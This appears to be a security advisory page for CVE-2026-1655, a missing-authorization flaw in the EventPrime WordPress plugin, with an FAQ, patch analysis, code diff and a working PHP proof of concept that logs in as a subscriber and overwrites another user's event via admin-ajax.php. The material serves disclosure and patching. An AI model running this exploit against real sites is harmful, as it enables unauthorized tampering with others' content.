What is CVE-2026-1655?

CVE-2026-1655 is a medium-severity vulnerability in the EventPrime plugin for WordPress that allows authenticated users to modify events created by others due to missing authorization checks. The flaw exists in the save_frontend_event_submission function, which does not properly verify user permissions before updating event posts.

Who is affected by this vulnerability?

All versions of the EventPrime plugin up to and including 4.2.8.4 are affected. This includes any WordPress site using these versions where authenticated users, such as Subscribers or higher, can exploit the vulnerability to modify events.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the EventPrime plugin installed on your WordPress site. If it is version 4.2.8.4 or earlier, your site is at risk and should be updated immediately.

How can I fix CVE-2026-1655?

The vulnerability is fixed in version 4.2.8.5 of the EventPrime plugin. To mitigate the issue, update the plugin to the latest version available from the WordPress plugin repository or the developer’s website.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized modifications if exploited. Administrators should take it seriously and apply the patch.

What are the practical risks of this vulnerability?

Successful exploitation of this vulnerability allows authenticated attackers to modify any event on the site, potentially leading to data integrity issues, defacement, and disruption of event management. This can harm the site’s reputation and operational functionality.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted request to the server with a valid nonce and a manipulated event_id. This demonstrates the ease of modifying events without proper authorization checks.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the EventPrime plugin temporarily to prevent exploitation. Additionally, review user roles and limit access to authenticated users to minimize risk until the plugin is updated.

What is the root cause of this vulnerability?

The root cause of CVE-2026-1655 is the lack of proper authorization checks in the save_frontend_event_submission function. It accepts a user-controlled event_id without verifying if the current user has permission to modify that event, allowing unauthorized modifications.

Are there any other security measures I should consider?

In addition to updating the plugin, ensure that your WordPress installation and all plugins are regularly updated. Implement strong user role management, use security plugins, and regularly audit user permissions to enhance overall site security.

What is the significance of nonce in this context?

A nonce is a security token used in WordPress to verify that requests to perform actions are legitimate and initiated by authenticated users. However, this vulnerability allows attackers to exploit the nonce mechanism to modify events, highlighting the importance of comprehensive authorization checks.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates related to WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1655: EventPrime <= 4.2.8.4 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Event Modification via 'event_id' Parameter (eventprime-event-calendar-management)

CVE ID CVE-2026-1655

Plugin eventprime-event-calendar-management

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 4.2.8.4

Patched Version 4.2.8.5

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1655:
This vulnerability is a missing authorization flaw in the EventPrime WordPress plugin, allowing authenticated users with the Subscriber role or higher to arbitrarily modify events created by other users, including administrators. The vulnerability exists in the frontend event submission functionality and has a CVSS score of 4.3.

Root Cause:
The vulnerability originates in the `save_frontend_event_submission` function within the `class-ep-ajax.php` file. In versions up to 4.2.8.4, the function accepted a user-controlled `event_id` parameter via the `$data` array and performed a `wp_update_post()` operation without proper ownership verification. The only check present was for guest submissions (`get_post_meta($post_id, ’em_user_submitted’, true) != get_current_user_id()`), which did not validate the post author or check WordPress capabilities for authenticated users. The vulnerable code path begins at line 891 where `$data[‘event_id’]` is processed.

Exploitation:
An attacker with at least Subscriber-level access must obtain a valid nonce for the frontend event submission action. They then send a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `save_frontend_event_submission`. The request includes the target `event_id` parameter pointing to an event they do not own, along with other event data fields like `em_name` and `em_descriptions`. The plugin processes this request through the vulnerable function, updating the target event post without authorization checks.

Patch Analysis:
The patch in version 4.2.8.5 adds comprehensive authorization checks before allowing event updates. The fix introduces three validation steps: it retrieves the current user ID, the post author ID via `get_post_field(‘post_author’, $post_id)`, and the submitted user ID from post meta (`em_user`). It then checks if the current user can edit the post using `current_user_can(‘edit_post’, $post_id)`, or if the current user matches either the post author or the submitted user. Only if one of these conditions is true (`$can_edit`) does the update proceed. The patch also adds `absint()` sanitization to the `event_id` parameter.

Impact:
Successful exploitation allows authenticated attackers to modify any event within the WordPress site, regardless of ownership. This can lead to defacement, data integrity issues, and disruption of event management. Attackers could alter event titles, descriptions, dates, or other metadata, potentially causing operational and reputational damage. The vulnerability does not grant direct administrative privileges but enables unauthorized modification of content typically restricted to event owners or administrators.

Differential between vulnerable and patched code

Code Diff

--- a/eventprime-event-calendar-management/event-prime.php
+++ b/eventprime-event-calendar-management/event-prime.php
@@ -16,7 +16,7 @@
  * Plugin Name:       EventPrime – Modern Events Calendar, Bookings and Tickets
  * Plugin URI:        https://theeventprime.com
  * Description:       Beginner-friendly Events Calendar plugin to create free as well as paid Events. Includes Event Types, Event Sites & Performers too.
- * Version:           4.2.8.4
+ * Version:           4.2.8.5
  * Author:            EventPrime Event Calendar
  * Author URI:        https://theeventprime.com/
  * License:           GPL-2.0+
@@ -35,7 +35,7 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define( 'EVENTPRIME_VERSION', '4.2.8.4' );
+define( 'EVENTPRIME_VERSION', '4.2.8.5' );
 define('EM_DB_VERSION',4.0);
 if( ! defined( 'EP_PLUGIN_FILE' ) ) {
     define( 'EP_PLUGIN_FILE', __FILE__ );
--- a/eventprime-event-calendar-management/includes/class-ep-ajax.php
+++ b/eventprime-event-calendar-management/includes/class-ep-ajax.php
@@ -891,18 +891,23 @@

             $event_description = wp_kses_post( stripslashes( $data['em_descriptions'] ) );

-            if( isset( $data['event_id'] ) && ! empty( $data['event_id'] ) ) {
-                $post_id = $data['event_id'];
-                if(empty(get_post($post_id)) || get_post_type($post_id) != 'em_event' ){
-                    wp_send_json_error( array( 'error' => esc_html__( 'There is some issue with event. Please try later.', 'eventprime-event-calendar-management' ) ) );
-                }
-                if(!empty($guest_submission) && get_post_meta($post_id, 'em_user_submitted', true) != get_current_user_id()){
-                       wp_send_json_error( array( 'error' => esc_html__( 'Event does not belong to you.', 'eventprime-event-calendar-management' ) ) );
-
-                }
-                $post_update = array(
-                    'ID'         => $post_id,
-                    'post_title' => $em_name,
+            if( isset( $data['event_id'] ) && ! empty( $data['event_id'] ) ) {
+                $post_id = absint( $data['event_id'] );
+                if(empty(get_post($post_id)) || get_post_type($post_id) != 'em_event' ){
+                    wp_send_json_error( array( 'error' => esc_html__( 'There is some issue with event. Please try later.', 'eventprime-event-calendar-management' ) ) );
+                }
+                $current_user_id = get_current_user_id();
+                $post_author_id = (int) get_post_field( 'post_author', $post_id );
+                $submitted_user_id = (int) get_post_meta( $post_id, 'em_user', true );
+                $can_edit = current_user_can( 'edit_post', $post_id )
+                    || ( $current_user_id > 0 && $post_author_id === $current_user_id )
+                    || ( $current_user_id > 0 && $submitted_user_id === $current_user_id );
+                if ( ! $can_edit ) {
+                    wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to edit this event.', 'eventprime-event-calendar-management' ) ) );
+                }
+                $post_update = array(
+                    'ID'         => $post_id,
+                    'post_title' => $em_name,
                     'post_content' => $event_description,
                 );
                 wp_update_post( $post_update );
@@ -1759,45 +1764,59 @@
     }


-    public function upload_file_media(){
-        if(isset($_FILES["file"]) && !empty($_FILES["file"])){
-            $extension = pathinfo( $_FILES["file"]["name"], PATHINFO_EXTENSION );
-            if( $extension != 'jpg' && $extension != 'jpeg' && $extension != 'png' && $extension != 'gif' ) {
-                wp_send_json_error( array( 'errors' => array( 'Only Image File Allowed.' ) ) );
-            }
-            $file = $_FILES['file'];
-            $filename = $file['name'];
-            $tmp_name = $file['tmp_name'];
-            $upload_dir = wp_upload_dir();
-            if (move_uploaded_file($file["tmp_name"], $upload_dir['path'] . "/" . $filename)) {
-                $uploaded_file['file_name'] = $filename;
-                $uploaded_file['upload_url'] = $upload_dir['url'] . "/" . $filename;
-                $wp_filetype = wp_check_filetype($filename, null );
-                $attachment = array(
-                    'guid'           => $uploaded_file['upload_url'],
-                    'post_mime_type' => $wp_filetype['type'],
-                    'post_title'     => preg_replace( '/.[^.]+$/', '', $filename ),
-                    'post_content'   => '',
-                    'post_status'    => 'inherit'
-                );
-                $attachment_id = wp_insert_attachment( $attachment, $upload_dir['path'] . "/" . $filename );
-                if ( ! is_wp_error( $attachment_id ) ) {
-                    require_once(ABSPATH . "wp-admin" . '/includes/file.php');
-                    $attachment_data = wp_generate_attachment_metadata( $attachment_id, $upload_dir['path'] . "/" . $filename );
-                    wp_update_attachment_metadata( $attachment_id,  $attachment_data );
-                    $returnData['success'] = array( 'attachment_id' => $attachment_id );
-                }
-            }
-            else{
-                $returnData['errors'] = __($upload_file['error']);
-            }
-        }
-        if( isset( $returnData['success'] ) ) {
-            wp_send_json_success( $returnData['success'] );
-        }else{
-            wp_send_json_success( $returnData );
-        }
-    }
+    public function upload_file_media(){
+        if ( ! isset( $_POST['security'] ) || ! wp_verify_nonce( $_POST['security'], 'ep-frontend-event-submission-nonce' ) ) {
+            wp_send_json_error( array( 'errors' => array( esc_html__( 'Security check failed.', 'eventprime-event-calendar-management' ) ) ) );
+        }
+
+        if ( empty( $_FILES['file'] ) || empty( $_FILES['file']['name'] ) ) {
+            wp_send_json_error( array( 'errors' => array( esc_html__( 'No file provided.', 'eventprime-event-calendar-management' ) ) ) );
+        }
+
+        $file = $_FILES['file'];
+        $allowed_mimes = array(
+            'jpg|jpeg|jpe' => 'image/jpeg',
+            'png'          => 'image/png',
+            'gif'          => 'image/gif',
+        );
+        $filecheck = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed_mimes );
+        if ( empty( $filecheck['ext'] ) || empty( $filecheck['type'] ) ) {
+            wp_send_json_error( array( 'errors' => array( esc_html__( 'Only image files are allowed.', 'eventprime-event-calendar-management' ) ) ) );
+        }
+
+        require_once( ABSPATH . 'wp-admin/includes/file.php' );
+        require_once( ABSPATH . 'wp-admin/includes/image.php' );
+
+        $upload_overrides = array(
+            'test_form' => false,
+            'mimes'     => $allowed_mimes,
+        );
+        $uploaded = wp_handle_upload( $file, $upload_overrides );
+        if ( isset( $uploaded['error'] ) ) {
+            wp_send_json_error( array( 'errors' => array( $uploaded['error'] ) ) );
+        }
+
+        $safe_name = sanitize_file_name( $file['name'] );
+        $attachment = array(
+            'guid'           => $uploaded['url'],
+            'post_mime_type' => $filecheck['type'],
+            'post_title'     => preg_replace( '/.[^.]+$/', '', $safe_name ),
+            'post_content'   => '',
+            'post_status'    => 'inherit'
+        );
+        $attachment_id = wp_insert_attachment( $attachment, $uploaded['file'] );
+        if ( ! is_wp_error( $attachment_id ) ) {
+            $attachment_data = wp_generate_attachment_metadata( $attachment_id, $uploaded['file'] );
+            wp_update_attachment_metadata( $attachment_id, $attachment_data );
+            $returnData['success'] = array( 'attachment_id' => $attachment_id );
+        }
+
+        if ( isset( $returnData['success'] ) ) {
+            wp_send_json_success( $returnData['success'] );
+        } else {
+            wp_send_json_success( $returnData );
+        }
+    }


     public function booking_update_status(){
--- a/eventprime-event-calendar-management/includes/class-eventprime-event-calendar-management.php
+++ b/eventprime-event-calendar-management/includes/class-eventprime-event-calendar-management.php
@@ -374,11 +374,11 @@
                 $this->loader->add_filter( 'handle_bulk_actions-edit-em_booking', $plugin_admin, 'ep_export_booking_bulk_action_handle', 10, 3 );

                 $this->loader->add_action( 'admin_head-edit.php',$plugin_admin, 'ep_add_booking_export_btn');
-                $this->loader->add_action( 'before_delete_post', $plugin_admin, 'ep_before_delete_event_bookings', 99, 2 );
-
-                $this->loader->add_action( 'save_post', $plugin_admin, 'ep_save_event_meta_boxes', 1, 2 );
-                $this->loader->add_filter( 'wp_insert_post_data', $plugin_admin, 'ep_respect_requested_post_status', 10, 2 );
-                $this->loader->add_filter( 'manage_em_event_posts_columns', $plugin_admin, 'ep_filter_event_columns'  );
+                $this->loader->add_action( 'before_delete_post', $plugin_admin, 'ep_before_delete_event_bookings', 99, 2 );
+
+                $this->loader->add_action( 'save_post', $plugin_admin, 'ep_save_event_meta_boxes', 1, 2 );
+                $this->loader->add_filter( 'wp_insert_post_data', $plugin_admin, 'ep_respect_requested_post_status', 10, 2 );
+                $this->loader->add_filter( 'manage_em_event_posts_columns', $plugin_admin, 'ep_filter_event_columns'  );
 		$this->loader->add_action( 'manage_em_event_posts_custom_column', $plugin_admin, 'ep_filter_event_columns_content', 10, 2 );
 		$this->loader->add_filter( 'manage_edit-em_event_sortable_columns',$plugin_admin, 'ep_sortable_event_columns', 10, 1 );
 		$this->loader->add_action( 'pre_get_posts',  $plugin_admin, 'ep_sort_events_date' , 10, 1 );
@@ -665,4 +665,4 @@
 		}
 	}

-}
+}
--- a/eventprime-event-calendar-management/includes/class-eventprime-functions.php
+++ b/eventprime-event-calendar-management/includes/class-eventprime-functions.php
@@ -141,15 +141,27 @@
                 $url = add_query_arg($slug, $id, $url);
             }
             $enable_seo_urls = $this->ep_get_global_settings('enable_seo_urls');
-            if (!empty($enable_seo_urls) && !empty($permalink)) {
-                $url = get_permalink($id);
-                if ($type == 'term') {
-                    if (empty($taxonomy)) {
-                        $taxonomy = get_term($id)->taxonomy;
-                    }
-                    $url = get_term_link($id, $taxonomy);
-                }
-            }
+            if (!empty($enable_seo_urls) && !empty($permalink)) {
+                $url = get_permalink($id);
+                if ($type == 'term') {
+                    $term = null;
+                    if (empty($taxonomy)) {
+                        $term = get_term($id);
+                        if (!is_wp_error($term) && $term && !empty($term->taxonomy)) {
+                            $taxonomy = $term->taxonomy;
+                        }
+                    }
+                    if (empty($term)) {
+                        $term = get_term($id, $taxonomy);
+                    }
+                    if (!is_wp_error($term) && $term && !empty($term->term_id)) {
+                        $term_link = get_term_link($term);
+                        if (!is_wp_error($term_link)) {
+                            $url = $term_link;
+                        }
+                    }
+                }
+            }
         }
         return $url;
     }
@@ -14018,6 +14030,13 @@
             'done'           => true,
         );
     }
+
+    public function get_event_id_from_ticket_id($ticket_id)
+    {
+        $DBhandler = new EP_DBhandler();
+        $event_id = $DBhandler->get_value('TICKET','event_id', $ticket_id);
+        return $event_id;
+    }


 }
--- a/eventprime-event-calendar-management/public/partials/eventprime-event-type.php
+++ b/eventprime-event-calendar-management/public/partials/eventprime-event-type.php
@@ -11,6 +11,7 @@
 }
         $event_type_id            = absint( $atts['id'] );
         $term                     = get_term( $event_type_id );
+        $event_types_data         = array();
         if( ! empty( $term ) ) {
             wp_enqueue_script(
                 'ep-eventtypes-details',
@@ -26,7 +27,7 @@
                 )
             );

-            $event_types_data         = array();
+
             $event_types_data['term'] = $term;
             $event_types_data['event_type'] = $ep_functions->get_single_event_type( $term->term_id );
             // upcoming events
@@ -86,6 +87,7 @@
             plugin_dir_url( EP_PLUGIN_FILE ) . 'public/css/ep-frontend-views.css',
             false, EVENTPRIME_VERSION
         );
+        //var_dump($event_type_data);die;
         $args = (object)$event_types_data;
 ?>
 <div class="emagic">
--- a/eventprime-event-calendar-management/public/partials/themes/default/events/views/calendar.php
+++ b/eventprime-event-calendar-management/public/partials/themes/default/events/views/calendar.php
@@ -28,12 +28,21 @@
             <div class="ep-event-type ep-event-type ep-mr-2 ep-border ep-p-2 ep-rounded-1 ep-lh-0 ep-di-flex ep-align-items-center ep-mb-2">
                 <?php
                 $type_id = (int)trim($type_id);
+                $type = get_term( $type_id );
+                if ( is_wp_error( $type ) || ! $type  || empty( $type->term_id ) ) {
+                    continue;
+                }
+
                 $type_url = $ep_functions->ep_get_custom_page_url( 'event_types', $type_id, 'event_type', 'term' );
                 $enable_seo_urls = $ep_functions->ep_get_global_settings( 'enable_seo_urls' );
-                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) ){
-                    $type_url = get_term_link( $type_id );
+                $permalink_structure = get_option( 'permalink_structure' );
+                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) && ! empty( $permalink_structure ) ){
+                    $term_link = get_term_link( $type ); // pass term object is safer
+                    if ( ! is_wp_error( $term_link ) ) {
+                        $type_url = $term_link;
+                    }
                 }
-                $type = get_term( $type_id );
+
                 $type_color = get_term_meta( $type->term_id, 'em_color', true );
                 ?>
                 <a class="ep-outline-width-0" href="<?php echo esc_url( $type_url ); ?>"><?php echo esc_html( $type->name ); ?></a><?php
@@ -49,9 +58,16 @@
                 <?php
                 $type_url = $ep_functions->ep_get_custom_page_url( 'event_types', $type['id'], 'event_type', 'term' );
                 $enable_seo_urls = $ep_functions->ep_get_global_settings( 'enable_seo_urls' );
-                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) ){
-                    $type_url = get_term_link( $type['id'] );
-                }?>
+                $permalink_structure = get_option( 'permalink_structure' );
+                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) && ! empty( $permalink_structure ) ){
+                    $term_link = get_term_link( $type['id'] ); // pass term object is safer
+                    if ( ! is_wp_error( $term_link ) ) {
+                        $type_url = $term_link;
+                    }
+                }
+
+
+                ?>
                 <a class="ep-outline-width-0" href="<?php echo esc_url( $type_url ); ?>"><?php echo esc_html( $type['name'] ); ?></a><?php
                 if( ! empty( $type['em_color'] ) && $type['em_color'] != '#' ) {?>
                     <span style="background-color:<?php echo esc_attr( $type['em_color'] ); ?>" class="ep-ml-1"></span><?php

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1655 - EventPrime <= 4.2.8.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Event Modification via 'event_id' Parameter

<?php
/**
 * Proof of Concept for CVE-2026-1655
 * Requires: Valid WordPress subscriber (or higher) credentials and a valid nonce
 * Target: WordPress site with EventPrime plugin <= 4.2.8.4
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$username = 'attacker'; // CHANGE THIS
$password = 'password'; // CHANGE THIS
$target_event_id = 123; // CHANGE THIS - ID of event to modify
$new_event_title = 'Hacked Event Title'; // CHANGE THIS

// Step 1: Authenticate and obtain cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Extract nonce from frontend event submission form
// Note: The nonce is typically available on event creation/edit pages
// This step requires visiting a page that contains the nonce
$event_creation_url = $target_url . '/events/'; // Adjust path as needed
curl_setopt($ch, CURLOPT_URL, $event_creation_url);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation depends on page structure)
// The nonce is typically in a meta tag or JavaScript variable
// For this PoC, we assume you've manually obtained the nonce
$nonce = 'YOUR_VALID_NONCE_HERE'; // CHANGE THIS - Obtain from page source

// Step 3: Exploit the vulnerability
$post_data = [
    'action' => 'save_frontend_event_submission',
    'event_id' => $target_event_id,
    'em_name' => $new_event_title,
    'em_descriptions' => 'Modified by attacker',
    'security' => $nonce, // Required nonce for the action
    // Include other required fields as per the form
    'em_start_date' => date('Y-m-d'),
    'em_end_date' => date('Y-m-d'),
    'em_start_time' => '10:00',
    'em_end_time' => '12:00'
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

// Check response
if (strpos($response, 'success') !== false) {
    echo "[+] Event successfully modified!n";
    echo "Response: " . $response . "n";
} else {
    echo "[-] Exploit failed. Response: " . $response . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1655?
Overview of the vulnerability
CVE-2026-1655 is a medium-severity vulnerability in the EventPrime plugin for WordPress that allows authenticated users to modify events created by others due to missing authorization checks. The flaw exists in the save_frontend_event_submission function, which does not properly verify user permissions before updating event posts.
Who is affected by this vulnerability?
Identifying vulnerable versions
All versions of the EventPrime plugin up to and including 4.2.8.4 are affected. This includes any WordPress site using these versions where authenticated users, such as Subscribers or higher, can exploit the vulnerability to modify events.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the EventPrime plugin installed on your WordPress site. If it is version 4.2.8.4 or earlier, your site is at risk and should be updated immediately.
How can I fix CVE-2026-1655?
Updating the plugin
The vulnerability is fixed in version 4.2.8.5 of the EventPrime plugin. To mitigate the issue, update the plugin to the latest version available from the WordPress plugin repository or the developer’s website.
What does the CVSS score of 4.3 indicate?
Understanding severity levels
The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized modifications if exploited. Administrators should take it seriously and apply the patch.
What are the practical risks of this vulnerability?
Potential impacts on your site
Successful exploitation of this vulnerability allows authenticated attackers to modify any event on the site, potentially leading to data integrity issues, defacement, and disruption of event management. This can harm the site’s reputation and operational functionality.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept shows how an authenticated user can exploit the vulnerability by sending a crafted request to the server with a valid nonce and a manipulated event_id. This demonstrates the ease of modifying events without proper authorization checks.
What should I do if I cannot update the plugin immediately?
Temporary mitigation steps
If immediate updating is not possible, consider disabling the EventPrime plugin temporarily to prevent exploitation. Additionally, review user roles and limit access to authenticated users to minimize risk until the plugin is updated.
What is the root cause of this vulnerability?
Technical explanation
The root cause of CVE-2026-1655 is the lack of proper authorization checks in the save_frontend_event_submission function. It accepts a user-controlled event_id without verifying if the current user has permission to modify that event, allowing unauthorized modifications.
Are there any other security measures I should consider?
Enhancing overall site security
In addition to updating the plugin, ensure that your WordPress installation and all plugins are regularly updated. Implement strong user role management, use security plugins, and regularly audit user permissions to enhance overall site security.
What is the significance of nonce in this context?
Understanding nonce usage
A nonce is a security token used in WordPress to verify that requests to perform actions are legitimate and initiated by authenticated users. However, this vulnerability allows attackers to exploit the nonce mechanism to modify events, highlighting the importance of comprehensive authorization checks.
How can I stay informed about future vulnerabilities?
Monitoring security updates
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates related to WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations